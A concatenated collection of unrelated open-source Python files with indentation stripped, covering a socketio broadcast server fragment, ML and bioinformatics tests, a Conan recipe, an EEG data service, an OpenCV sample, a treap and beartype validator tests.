# todo broadcast 广播消息
@sio.event
async def emit_broadcast():
data = "服务发来的消息"
print('消息被执行')
await sio.emit('broadcast', {'xxx': data})
@sio.event
async def my_broadcast_event(sid, message):
print(3333, sid, message)
# await sio.emit('my_response', {'data': message['data']})
# todo 微博消息
# We bind our aiohttp endpoint to our app
# router
# 断开连接
@sio.event
def disconnect(sid):
pass
# print('disconnect: ', sid)
async def background_task():
while True:
# 每一分钟读取数据库,前20条,并打标记,过滤打非标记,再入库
await sio.sleep(5)
news_list = query_list('broadcast')
# 广播的数据
broadcast_list = [item for item in json.loads(news_list) if 'is_read' not in item]
await sio.emit('my_response', {'code': 0, 'data': broadcast_list})
for item in broadcast_list:
print(item)
# item['_id'] = item['_id']['$oid']
del item['_id']
item['is_read'] = 1
print('1111=>',item)
update_news(item, 'broadcast')
app.router.add_get('/', index)
async def xx():
while True:
await sio.sleep(2)
await sio.emit('my_response', {'x': 44})
def server_app(application):
sio.start_background_task(background_task)
web.run_app(application)
# We kick off our server
if __name__ == '__main__':
server_app(app)
|
h2o-py/tests/testdir_algos/glm/pyunit_glm_regularization_path.py | ahmedengu/h2o-3 | 6,098 | 11097296 | import sys
sys.path.insert(1,"../../../")
import h2o
from builtins import range
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator as glm
def reg_path_glm():
# read in the dataset and construct training set (and validation set)
d = h2o.import_file(path=pyunit_utils.locate("smalldata/logreg/prostate.csv"))
m = glm(family='binomial',lambda_search=True,solver='COORDINATE_DESCENT')
m.train(training_frame=d,x=[2,3,4,5,6,7,8],y=1)
r = glm.getGLMRegularizationPath(m)
m2 = glm.makeGLMModel(model=m,coefs=r['coefficients'][10])
dev1 = r['explained_deviance_train'][10]
p = m2.model_performance(d)
dev2 = 1-p.residual_deviance()/p.null_deviance()
print(dev1," =?= ",dev2)
assert abs(dev1 - dev2) < 1e-6
for l in range(0,len(r['lambdas'])):
m = glm(family='binomial',lambda_search=False,Lambda=r['lambdas'][l],solver='COORDINATE_DESCENT')
m.train(training_frame=d,x=[2,3,4,5,6,7,8],y=1)
cs = r['coefficients'][l]
cs_norm = r['coefficients_std'][l]
diff = 0
diff2 = 0
for n in cs.keys():
diff = max(diff,abs((cs[n] - m.coef()[n])))
diff2 = max(diff2,abs((cs_norm[n] - m.coef_norm()[n])))
print(diff)
print(diff2)
assert diff < 1e-2
assert diff2 < 1e-2
p = m.model_performance(d)
devm = 1-p.residual_deviance()/p.null_deviance()
devn = r['explained_deviance_train'][l]
print(devm)
print(devn)
assert abs(devm - devn) < 1e-4
if __name__ == "__main__":
pyunit_utils.standalone_test(reg_path_glm)
else:
reg_path_glm()
|
learning_python/modules/collateral/module_basics/use_module2b.py | fallenfuzz/pynet | 528 | 11097349 | from my_module2 import dns_ip
dns_ip()
dns_ip(dns="1.1.1.1")
|
tools/SDKTool/src/ui/tree/ai_tree/action_rain_bow_data.py | Passer-D/GameAISDK | 1,210 | 11097352 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import logging
from .action_dqn_data import DqnActionData
from ....config_manager.ai.ai_manager import AIManager, AIAlgorithmType
logger = logging.getLogger("sdktool")
class RainBowActionData(DqnActionData):
def __init__(self):
ai_mgr = AIManager()
self.__game_action = ai_mgr.get_game_action(3)
self.__ai_action = ai_mgr.get_ai_action(3)
@staticmethod
def get_game_action_inner():
return AIManager().get_game_action(AIAlgorithmType.RAINBOW)
@staticmethod
def get_ai_action_inner():
return AIManager().get_ai_action(AIAlgorithmType.RAINBOW)
|
eeg_modelling/eeg_viewer/waveform_data_service.py | deepneuralmachine/google-research | 23,901 | 11097362 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains methods for packaging data from a DataSource for the API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import logging
import numpy as np
from scipy import signal
from eeg_modelling.eeg_viewer import utils
from eeg_modelling.pyprotos import data_pb2
# The double banana refers to a common montage used to display EEG data.
# Each tuple represents a 'standard' in the montage, which is a subtraction of
# the signals from two EEG leads placed on the scalp.
# Elements containing '|' allow for differences in lead naming conventions
# between datasets.
_DOUBLE_BANANA = [('FP1', 'F7'), ('F7', 'T3|T7'), ('T3|T7', 'T5|P7'),
('T5|P7', 'O1'),
('FP2', 'F8'), ('F8', 'T4|T8'), ('T4|T8', 'T6|P8'),
('T6|P8', 'O2'),
('FP1', 'F3'), ('F3', 'C3'), ('C3', 'P3'), ('P3', 'O1'),
('FP2', 'F4'), ('F4', 'C4'), ('C4', 'P4'), ('P4', 'O2'),
('FZ', 'CZ'), ('CZ', 'PZ'),
('EKG1', 'EKG2')]
# The standard set of leads for a 12 lead ECG
_ECG_12_LEAD = [('I',), ('II',), ('III',), ('AVR',), ('AVL',), ('AVF',),
('V1',), ('V2',), ('V3',), ('V4',), ('V5',), ('V6',)]
def _FilterData(row_data, index, data_source, low_cut, high_cut, notch):
"""Runs full segment data through low and high pass filters.
Args:
row_data: Full segment data for a single channel.
index: The index for a single channel.
data_source: The DataSource for the waveform data.
low_cut: lower frequency to apply a band-pass filter.
high_cut: higher frequency to apply a band-pass filter.
notch: frequency to apply a notch filter.
Returns:
Filtered input row data.
"""
nyquist_freq = data_source.GetChannelSamplingFrequency(index) / 2
low_val = low_cut / nyquist_freq
high_val = high_cut / nyquist_freq
notch_val = notch / nyquist_freq
pad_len = int(nyquist_freq) if int(nyquist_freq) else 1
padded_data = np.pad(row_data, (pad_len, pad_len), 'symmetric')
if low_val > 0 and low_val < 1:
# Using a 1st-order forward pass filter to match NK viewer
b, a = signal.butter(1, [low_val], btype='high', analog=False)
padded_data = signal.lfilter(b, a, padded_data)
if high_val > 0 and high_val < 1:
# Using a 1st-order forward pass filter to match NK viewer
b, a = signal.butter(1, [high_val], btype='low', analog=False)
padded_data = signal.lfilter(b, a, padded_data)
if notch_val > 0 and notch_val < 1:
b, a = signal.iirnotch(notch_val, 30)
padded_data = signal.lfilter(b, a, padded_data)
return padded_data[pad_len:-pad_len]
def _GetChannelIndicesInChannelDataIdList(id_list):
"""Returns a list of all the unique channel indices requested."""
channel_indices = []
for ch in id_list:
if ch.HasField('bipolar_channel'):
request_indices = [
ch.bipolar_channel.index, ch.bipolar_channel.referential_index
]
else:
request_indices = [ch.single_channel.index]
channel_indices = channel_indices + request_indices
return list(set(channel_indices))
def _CreateChannelData(data_source,
channel_data_ids,
low_cut,
high_cut,
notch,
start=0,
duration=None,
max_samples=None):
"""Returns a list of channel names and a dictionary of their values.
Args:
data_source: The DataSource for the waveform data.
channel_data_ids: ChannelDataIds list.
low_cut: lower frequency to apply a band-pass filter.
high_cut: higher frequency to apply a band-pass filter.
notch: frequency to apply a notch filter.
start: start time to crop the data, relative to the start of the file (in
seconds). Defaults to the start of the file.
duration: duration to crop from the data, in seconds. If None, will get the
whole file data.
max_samples: The maximum number of samples in one channel response.
If None, there is no maximum limit.
Returns:
A dictionary of channel names mapped to the requested time slice of their
data and an ordered list of the channel names.
Raises:
ValueError: Too many feature keys provided (only handles raw features or
subtraction of two features).
"""
if duration is None:
duration = data_source.GetLength()
channel_indices = _GetChannelIndicesInChannelDataIdList(channel_data_ids)
single_channel_data = data_source.GetChannelData(
channel_indices, start, duration)
subsampling = 1 if max_samples is None else utils.GetSubsamplingRate(
len(list(single_channel_data.values())[0]), max_samples)
def _GetFilteredData(index):
"""Wrapper to call _FilterData function.
Args:
index: the index for the selected channel.
Returns:
Filtered data for the selected channel.
"""
return _FilterData(single_channel_data[str(index)],
index,
data_source,
low_cut,
high_cut,
notch)
req_channel_data = {}
channel_names = []
for channel_data_id in channel_data_ids:
if channel_data_id.HasField('bipolar_channel'):
primary_index = channel_data_id.bipolar_channel.index
primary_data = _GetFilteredData(primary_index)
ref_index = channel_data_id.bipolar_channel.referential_index
ref_data = _GetFilteredData(ref_index)
channel_data = [reference - primary for (primary, reference) in
zip(primary_data, ref_data)]
channel_name = '-'.join(data_source.GetChannelName(index)
for index in [primary_index, ref_index])
elif channel_data_id.HasField('single_channel'):
index = channel_data_id.single_channel.index
channel_data = _GetFilteredData(index)
channel_name = data_source.GetChannelName(index)
else:
raise ValueError('Unfamiliary channel type %s' % channel_data_id)
req_channel_data[channel_name] = channel_data[::subsampling]
channel_names.append(channel_name)
return req_channel_data, channel_names
def _AddDataTableSeries(channel_data, output_data):
"""Adds series to the DataTable inputs.
Args:
channel_data: A dictionary of channel names to their data. Each value in
the dictionary has the same sampling frequency and the same time slice.
output_data: Current graph data for DataTable API.
Returns:
The edited output_data dictionary where the first index represents the
time axis value and the second the series value.
"""
for i in range(len(list(channel_data.values())[0])):
output_data[i].update({channel_name: data[i]
for channel_name, data in channel_data.items()})
return output_data
def GetSamplingFrequency(data_source, channel_data_ids):
"""Returns the sampling frequency for a group of channels.
Args:
data_source: DataSource instance.
channel_data_ids: Channels to get the sampling freq from.
Returns:
Sampling frequency for all the channels (must be the same).
"""
channel_indices = _GetChannelIndicesInChannelDataIdList(channel_data_ids)
return data_source.GetSamplingFrequency(channel_indices)
def _CreateChunkDataTableJSon(data_source, request, max_samples):
"""Creates a DataTable in JSON format which contains the data specified.
Data can be specified by a list of minuends and subtrahends of montage
standards and/or a list of channel keys.
Args:
data_source: The DataSource for the waveform data.
request: A DataRequest proto instance.
max_samples: The maximum number of samples in one channel response.
Returns:
JSON format DataTable loaded with montage data.
Raises:
ValueError: The requested channels have multiple frequency types.
"""
sample_freq = GetSamplingFrequency(data_source, request.channel_data_ids)
# Initialize Dygraph data with a time axis of sampling frequency.
output_data, _ = utils.InitDataTableInputsWithTimeAxis(
sample_freq, request.chunk_duration_secs, request.chunk_start,
max_samples)
columns_order = ['seconds']
channel_data, channel_names = _CreateChannelData(
data_source,
request.channel_data_ids,
request.low_cut,
request.high_cut,
request.notch,
start=request.chunk_start,
duration=request.chunk_duration_secs,
max_samples=max_samples)
output_data = _AddDataTableSeries(channel_data, output_data)
columns_order.extend(channel_names)
return (utils.ConvertToDataTableJSon(output_data, columns_order),
sample_freq)
def GetMetadata(data_source, max_samples):
"""Returns metadata consistent across the predictions.
Args:
data_source: The DataSource for the waveform data.
max_samples: The maximum number of samples in one channel response.
Returns:
A PredictionMetadata instance filled with PredictionOutput data.
"""
response = data_pb2.WaveformMetadata()
response.abs_start = data_source.GetStartTime()
response.labels.extend(data_source.GetAnnotations())
for index, channel in data_source.GetChannelIndexDict().iteritems():
response.channel_dict[index] = channel
response.file_type = data_source.GetFileType()
response.nav_timeline_datatable = utils.CreateEmptyTable(
data_source.GetLength(), max_samples)
response.num_secs = data_source.GetLength()
response.patient_id = data_source.GetPatientId()
response.sstable_key = data_source.GetFileKey()
return response
def _GetChannelIndexFromNameOptions(channel_opts, data_source):
indices = [data_source.GetChannelIndexFromName(opt)
for opt in channel_opts.split('|')
if data_source.GetChannelIndexFromName(opt)]
return indices[0] if indices else None
def _GetChannelDataIdFromNameOptions(channel_name, data_source):
"""Creates a ChannelDataId for a channel name string with name options.
Sometimes channel naming conventions for the same electrode placement vary
between institutions, so the options allow us to cover all cases.
Args:
channel_name: A tuple of strings with channel name options joined on '|'.
data_source: The DataSource for the waveform data.
Returns:
A ChannelDataId filled out with the indices for the given name tuple.
"""
channel_id = None
if len(channel_name) == 2:
primary_index = _GetChannelIndexFromNameOptions(channel_name[0],
data_source)
ref_index = _GetChannelIndexFromNameOptions(channel_name[1], data_source)
if primary_index is not None and ref_index is not None:
channel_id = data_pb2.ChannelDataId()
channel_id.bipolar_channel.index = int(primary_index)
channel_id.bipolar_channel.referential_index = int(ref_index)
if len(channel_name) == 1:
index = _GetChannelIndexFromNameOptions(channel_name[0], data_source)
if index is not None:
channel_id = data_pb2.ChannelDataId()
channel_id.single_channel.index = int(index)
return channel_id
def _GetDefaultChannelDataIdList(data_source):
"""Returns the list of default features when a request does not specify.
When a data request is made for the first time with a set of file
parameters, the client does not have the lookup table with the channel
indices, therefore the client cannot specify channels until after the
initial load. To deal with this case, when no channel indices are provided,
we generate a list of channel indices using the lookup table and default
channel requests that are hardcoded for each medical waveform data type.
Those channel indices will be used as the request indices.
Args:
data_source: The DataSource for the waveform data.
"""
default_channel_names = []
if data_source.GetFileType() == 'EEG':
default_channel_names = _DOUBLE_BANANA
elif (data_source.GetFileType() == 'EKG' or
data_source.GetFileType() == 'ECG'):
default_channel_names = _ECG_12_LEAD
default_channel_ids = [_GetChannelDataIdFromNameOptions(x, data_source)
for x in default_channel_names]
return [channel_id for channel_id in default_channel_ids if channel_id]
def GetChunk(data_source, request, max_samples):
"""Returns all graph data for current chunk.
Args:
data_source: The DataSource for the waveform data.
request: A DataRequest proto instance.
max_samples: The maximum number of samples in one channel response.
Returns:
A WaveformChunkResponse specified by the Request proto.
Raises:
ValueError: If chunk duration is not a positive integer.
"""
if (request.chunk_start >= data_source.GetLength() or
request.chunk_start + request.chunk_duration_secs <= 0):
raise ValueError('Chunk starting at %s is out of bounds'
% request.chunk_start)
if not request.channel_data_ids:
default_channels = _GetDefaultChannelDataIdList(data_source)
logging.info('Loading default channels')
request.channel_data_ids.extend(default_channels)
response = data_pb2.WaveformChunk()
waveform_datatable, sampling_freq = _CreateChunkDataTableJSon(data_source,
request,
max_samples)
response.waveform_datatable = waveform_datatable
response.sampling_freq = sampling_freq
response.channel_data_ids.extend(request.channel_data_ids)
return response
def GetChunkDataAsNumpy(data_source,
channel_data_ids,
low_cut,
high_cut,
notch):
"""Extract data from a data source as a numpy array.
Args:
data_source: A DataSource instance.
channel_data_ids: ChannelDataIds list.
low_cut: lower frequency to apply a band-pass filter.
high_cut: higher frequency to apply a band-pass filter.
notch: frequency to apply a notch filter.
Returns:
Numpy array of shape (n_channels, n_data) with the waveform data.
"""
channel_data, channel_names = _CreateChannelData(data_source,
channel_data_ids, low_cut,
high_cut, notch)
data = [channel_data[channel_name] for channel_name in channel_names]
data = np.array(data, dtype=np.float32)
return data
|
docs/conf.py | Leanny/mmpy_bot | 196 | 11097363 | # -*- coding: utf-8 -*-
import os
from mmpy_bot import __version__
os.environ["DJANGO_SETTINGS_MODULE"] = "settings"
extensions = ["sphinx.ext.autodoc", "sphinx.ext.todo"]
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
project = "mmpy_bot"
copyright = "2016, "
version = __version__
release = __version__
exclude_patterns = []
pygments_style = "sphinx"
html_theme = "default"
htmlhelp_basename = "mmpy_botdoc"
latex_documents = [
("index", "mmpy_bot.tex", "mmpy_bot Documentation", "", "manual"),
]
man_pages = [("index", "mmpy_bot", "mmpy_bot Documentation", ["gotlium"], 1)]
texinfo_documents = [
(
"index",
"mmpy_bot",
"Mattermost-bot Documentation",
"gotlium",
"mmpy_bot",
"One line description of project.",
"Miscellaneous",
),
]
|
recipes/opencore-amr/all/conanfile.py | rockandsalt/conan-center-index | 562 | 11097378 | <gh_stars>100-1000
from conans import ConanFile, AutoToolsBuildEnvironment, tools
from contextlib import contextmanager
import os
required_conan_version = ">=1.33.0"
class OpencoreAmrConan(ConanFile):
name = "opencore-amr"
homepage = "https://sourceforge.net/projects/opencore-amr/"
description = "OpenCORE Adaptive Multi Rate (AMR) speech codec library implementation."
topics = ("audio-codec", "amr", "opencore")
url = "https://github.com/conan-io/conan-center-index"
license = "Apache-2.0"
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
}
_autotools = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _settings_build(self):
return getattr(self, "settings_build", self.settings)
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
def build_requirements(self):
if self._settings_build.os == "Windows" and not tools.get_env("CONAN_BASH_PATH"):
self.build_requires("msys2/cci.latest")
if self.settings.compiler == "Visual Studio":
self.build_requires("automake/1.16.4")
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
@contextmanager
def _build_context(self):
if self.settings.compiler == "Visual Studio":
with tools.vcvars(self):
env = {
"CC": "cl -nologo",
"CXX": "cl -nologo",
"LD": "link -nologo",
"AR": "{} lib".format(tools.unix_path(self.deps_user_info["automake"].ar_lib)),
}
with tools.environment_append(env):
yield
else:
yield
def _configure_autotools(self):
if self._autotools:
return self._autotools
self._autotools = AutoToolsBuildEnvironment(self, win_bash=tools.os_info.is_windows)
yes_no = lambda v: "yes" if v else "no"
args = [
"--enable-shared={}".format(yes_no(self.options.shared)),
"--enable-static={}".format(yes_no(not self.options.shared)),
]
if self.settings.compiler == "Visual Studio":
self._autotools.cxx_flags.append("-EHsc")
if tools.Version(self.settings.compiler.version) >= "12":
self._autotools.flags.append("-FS")
self._autotools.configure(args=args, configure_dir=self._source_subfolder)
return self._autotools
def build(self):
with self._build_context():
self._configure_autotools()
self._autotools.make()
def package(self):
self._autotools.install()
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.la")
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
if self.settings.compiler == "Visual Studio" and self.options.shared:
for lib in ("opencore-amrwb", "opencore-amrnb"):
tools.rename(os.path.join(self.package_folder, "lib", "{}.dll.lib".format(lib)),
os.path.join(self.package_folder, "lib", "{}.lib".format(lib)))
def package_info(self):
for lib in ("opencore-amrwb", "opencore-amrnb"):
self.cpp_info.components[lib].names["pkg_config"] = lib
self.cpp_info.components[lib].libs = [lib]
|
samples/python/logpolar.py | thisisgopalmandal/opencv | 56,632 | 11097390 | <reponame>thisisgopalmandal/opencv<gh_stars>1000+
#!/usr/bin/env python
'''
plots image as logPolar and linearPolar
Usage:
logpolar.py
Keys:
ESC - exit
'''
# Python 2/3 compatibility
from __future__ import print_function
import numpy as np
import cv2 as cv
def main():
import sys
try:
fn = sys.argv[1]
except IndexError:
fn = 'fruits.jpg'
img = cv.imread(cv.samples.findFile(fn))
if img is None:
print('Failed to load image file:', fn)
sys.exit(1)
img2 = cv.logPolar(img, (img.shape[0]/2, img.shape[1]/2), 40, cv.WARP_FILL_OUTLIERS)
img3 = cv.linearPolar(img, (img.shape[0]/2, img.shape[1]/2), 40, cv.WARP_FILL_OUTLIERS)
cv.imshow('before', img)
cv.imshow('logpolar', img2)
cv.imshow('linearpolar', img3)
cv.waitKey(0)
print('Done')
if __name__ == '__main__':
print(__doc__)
main()
cv.destroyAllWindows()
|
underworld/libUnderworld/config/packages/libm.py | longgangfan/underworld2 | 116 | 11097394 | from config import Package
class libm(Package):
def gen_locations(self):
yield ('/usr/local', ['/usr/local'], ['/usr/local'])
def gen_envs(self, loc):
for env in Package.gen_envs(self, loc):
self.headers = ['math.h']
if self.find_libraries(loc[2], 'm'):
env.PrependUnique(LIBS=['m'])
yield env
|
indra/tests/test_omnipath.py | zebulon2/indra | 136 | 11097421 | <reponame>zebulon2/indra
import requests
from indra.sources.omnipath import OmniPathProcessor
from indra.sources.omnipath.api import op_url
from indra.statements import Agent
from indra.ontology.standardize import standardize_agent_name
BRAF_UPID = 'P15056'
JAK2_UPID = 'O60674'
CALM1_UPID = 'P0DP23'
TRPC3_UPID = 'Q13507'
BRAF_AG = Agent(None, db_refs={'UP': BRAF_UPID})
standardize_agent_name(BRAF_AG)
JAK2_AG = Agent(None, db_refs={'UP': JAK2_UPID})
standardize_agent_name(JAK2_AG)
CALM1_AG = Agent(None, db_refs={'UP': CALM1_UPID})
standardize_agent_name(CALM1_AG)
TRPC3_AG = Agent(None, db_refs={'UP': TRPC3_UPID})
standardize_agent_name(TRPC3_AG)
def test_omnipath_web_api():
query_url = '%s/queries' % op_url
res = requests.get(query_url)
assert res.status_code == 200
def test_mods_from_web():
params = {'format': 'json', 'substrates': JAK2_UPID,
'fields': ['sources', 'references']}
ptm_url = '%s/ptms' % op_url
res = requests.get(ptm_url, params=params)
assert res.status_code == 200
assert res.text
ptm_json = res.json()
assert ptm_json[0]['substrate'] == JAK2_UPID, ptm_json[0]['substrate']
op = OmniPathProcessor(ptm_json=ptm_json)
op.process_ptm_mods()
stmts = op.statements
assert JAK2_AG.name in [a.name for a in stmts[0].agent_list()],\
stmts[0].agent_list()
assert 'omnipath' == stmts[0].evidence[0].source_api,\
stmts[0].evidence[0].source_api
def test_ligrec_from_web():
params = {'format': 'json', 'datasets': ['ligrecextra'],
'fields': ['curation_effort', 'entity_type', 'references',
'resources', 'sources', 'type'],
'sources': [CALM1_UPID]}
query_url = '%s/interactions' % op_url
res = requests.get(query_url, params)
assert res.status_code == 200
assert res.text
assert 'error' not in res.text.lower()
ligrec_json = res.json()
assert ligrec_json[0]['source'] == CALM1_UPID
op = OmniPathProcessor(ligrec_json=ligrec_json)
op.process_ligrec_interactions()
stmts = op.statements
assert CALM1_AG.name in [a.name for a in stmts[0].agent_list()], \
stmts[0].agent_list()
assert 'omnipath' == stmts[0].evidence[0].source_api,\
stmts[0].evidence[0].source_api
|
brew/metrics/evaluation.py | va26/brew | 344 | 11097437 | import numpy as np
import sklearn
import sklearn.metrics
class Evaluator(object):
def __init__(self, metric='auc'):
if metric == 'auc':
self.metric = auc_score
elif metric == 'acc':
self.metric = acc_score
def calculate(self, y_true, y_pred):
return self.metric(y_true, y_pred)
def auc_score(y_true, y_pred, positive_label=1):
if hasattr(sklearn.metrics, 'roc_auc_score'):
return sklearn.metrics.roc_auc_score(y_true, y_pred)
fp_rate, tp_rate, thresholds = sklearn.metrics.roc_curve(
y_true, y_pred, pos_label=positive_label)
return sklearn.metrics.auc(fp_rate, tp_rate)
def acc_score(y_true, y_pred, positive_label=1):
if hasattr(sklearn.metrics, 'accuracy_score'):
return sklearn.metrics.accuracy_score(y_true, y_pred)
return float(np.sum(y_true == y_pred)) / y_true.shape[0]
|
data_structures/trees/treap.py | vinta/fuck-coding-interviews | 590 | 11097443 | # coding: utf-8
"""
Treap
https://en.wikipedia.org/wiki/Treap
Treap is a self-balancing binary search tree which satisfies some extra properties:
- Each node has a random priority.
- Each random priority satisfies the properties of a heap.
- The parent's priority is less than or equal to children's priorities.
- The root's priority would be the minimum of the tree.
- Each of left and right subtree is also a heap.
"""
import random
class TreeNode:
__slots__ = ['_priority', 'value', 'left', 'right']
def __init__(self, value, left=None, right=None):
self._priority = random.random() # Read-only.
self.value = value
self.left = left
self.right = right
@property
def priority(self):
return self._priority
def right_rotate(self):
# root pivot
# / \ / \
# pivot gamma => alpha root
# / \ / \
# alpha beta beta gamma
# https://en.wikipedia.org/wiki/Tree_rotation
root = self
pivot = root.left
root.left = pivot.right
pivot.right = root
return pivot
def left_rotate(self):
root = self
pivot = root.right
root.right = pivot.left
pivot.left = root
return pivot
def check_validation(self):
if self.left:
assert self.priority <= self.left.priority
self.left.check_validation()
if self.right:
assert self.priority <= self.right.priority
self.right.check_validation()
class Treap:
DEFAULT_TO_ROOT = object()
NODE_CLASS = TreeNode
def __init__(self):
self.root = None
self.size = 0
def __len__(self):
return self.size
def __iter__(self):
return self.inorder_traverse(self.root)
def _search_node(self, node, value):
if not node:
return None
if value == node.value:
return node
elif value < node.value:
return self._search_node(node.left, value)
elif value > node.value:
return self._search_node(node.right, value)
def search(self, value):
return self._search_node(self.root, value)
def _insert_node(self, node, value):
if not node:
self.size += 1
node = self.NODE_CLASS(value=value)
return node
if value <= node.value:
node.left = self._insert_node(node.left, value)
if node.left.priority < node.priority:
node = node.right_rotate()
elif value > node.value:
node.right = self._insert_node(node.right, value)
if node.right.priority < node.priority:
node = node.left_rotate()
return node
def insert(self, value):
self.root = self._insert_node(self.root, value)
def _delete_node(self, node, value):
if not node:
raise ValueError('Not found')
if value == node.value:
if (node.left is None) and (node.right is None): # Leaf nodes can be simply deleted.
self.size -= 1
return None
elif node.left is None:
self.size -= 1
return node.right
elif node.right is None:
self.size -= 1
return node.left
elif node.left and node.right:
if node.left.priority < node.right.priority:
node = node.right_rotate()
node.right = self._delete_node(node.right, value)
else:
node = node.left_rotate()
node.left = self._delete_node(node.left, value)
elif value < node.value:
node.left = self._delete_node(node.left, value)
elif value > node.value:
node.right = self._delete_node(node.right, value)
return node
def delete(self, value):
self.root = self._delete_node(self.root, value)
def inorder_traverse(self, node):
if not node:
return
yield from self.inorder_traverse(node.left)
yield node.value
yield from self.inorder_traverse(node.right)
def levelorder_traverse_nodes(self, node=DEFAULT_TO_ROOT):
if node == self.DEFAULT_TO_ROOT:
node = self.root
current_level = [node, ]
while current_level:
next_level = []
for node in current_level:
if node:
yield node
next_level.extend([node.left, node.right])
current_level = next_level
|
beartype_test/a00_unit/a20_api/vale/_factory/test_valeisobj.py | vcokltfre/beartype | 1,056 | 11097445 | <filename>beartype_test/a00_unit/a20_api/vale/_factory/test_valeisobj.py
#!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2021 Beartype authors.
# See "LICENSE" for further details.
'''
**Beartype code-based object data validation unit tests.**
This submodule unit tests the subset of the public API of the
:mod:`beartype.vale` subpackage defined by the private
:mod:`beartype.vale._factory._valeisobj` submodule.
'''
# ....................{ IMPORTS }....................
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# WARNING: To raise human-readable test errors, avoid importing from
# package-specific submodules at module scope.
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# ....................{ CONSTANTS }....................
AS_WHEN_NIGHT_IS_BARE = (
"From one lonely cloud",
"The moon rains out her beams, and Heaven is overflow'd.",
)
'''
Arbitrary tuple to be assigned to an arbitrary instance variable of the
arbitrary class defined below.
'''
# ....................{ CLASSES ~ good }....................
class AllTheEarthAndAir(object):
'''
Arbitrary class defining an arbitrary attribute whose value has *no*
accessible attributes but satisfies a validator tested below.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
# Initialize this attribute to a shallow copy of this list rather
# than this list itself to properly test equality comparison.
self.with_thy_voice_is_loud = AS_WHEN_NIGHT_IS_BARE[:]
class WhatThouArtWeKnowNot(object):
'''
Arbitrary class defining an arbitrary attribute whose value is an instance
of another class defining another arbitrary attribute.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
self.what_is_most_like_thee = AllTheEarthAndAir()
# ....................{ CLASSES ~ bad }....................
class InAPalaceTower(object):
'''
Arbitrary class defining an arbitrary attribute of a differing name as that
defined by the :class:`AllTheEarthAndAir` class.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
self.soothing_her_love_laden = [
'Soul in secret hour',
'With music sweet as love, which overflows her bower:',
]
class TillTheWorldIsWrought(object):
'''
Arbitrary class defining an arbitrary attribute of the same name as that
defined by the :class:`AllTheEarthAndAir` class whose value has *no*
accessible attributes and does *not* satisfy a validator tested below.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
# Initialize this attribute to an arbitrary list unequal to the value
# initializing the comparable
# "AllTheEarthAndAir.with_thy_voice_is_loud" attribute.
self.with_thy_voice_is_loud = [
'To sympathy with hopes and fears it heeded not:',
'As from thy presence showers a rain of melody.',
]
class InADellOfDew(object):
'''
Arbitrary class defining an arbitrary attribute of the same name as that
defined by the :class:`WhatThouArtWeKnowNot` class whose value is an
instance of another class defining an attribute of the same name as that
defined by the :class:`AllTheEarthAndAir` class whose value does *not*
satisfy a validator tested below.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
self.what_is_most_like_thee = TillTheWorldIsWrought()
# ....................{ TESTS ~ class : isattr }....................
def test_api_vale_isattr_pass() -> None:
'''
Test successful usage of the :mod:`beartype.vale.IsAttr` factory.
'''
# Defer heavyweight imports.
from beartype.vale import IsAttr, IsEqual
from beartype.vale._valevale import BeartypeValidator
# Instances of valid test classes declared above.
from_rainbow_clouds = AllTheEarthAndAir()
drops_so_bright_to_see = WhatThouArtWeKnowNot()
# Instances of invalid test classes declared above.
like_a_glow_worm_golden = InAPalaceTower()
like_a_high_born_maiden = TillTheWorldIsWrought()
scattering_unbeholden = InADellOfDew()
# Validator produced by subscripting this factory with the name of an
# attribute defined by the former class and that attribute's value.
IsInTheLightOfThought = IsAttr[
'with_thy_voice_is_loud', IsEqual[AS_WHEN_NIGHT_IS_BARE]]
# Validator produced by subscripting this factory with the name of an
# attribute defined by the latter class and the prior validator.
IsSingingHymnsUnbidden = IsAttr[
'what_is_most_like_thee', IsInTheLightOfThought]
# Assert these validators satisfy the expected API.
assert isinstance(IsInTheLightOfThought, BeartypeValidator)
assert isinstance(IsSingingHymnsUnbidden, BeartypeValidator)
# Assert these validators produce the same objects when subscripted by the
# same arguments (and are thus memoized on subscripted arguments).
assert IsSingingHymnsUnbidden is IsAttr[
'what_is_most_like_thee', IsInTheLightOfThought]
# Assert these validators accept objects defining attributes with the same
# names and values as those subscripting these validators.
assert IsInTheLightOfThought.is_valid(from_rainbow_clouds) is True
assert IsSingingHymnsUnbidden.is_valid(drops_so_bright_to_see) is True
# Assert these validators reject objects defining attributes with differing
# names to those subscripting these validators.
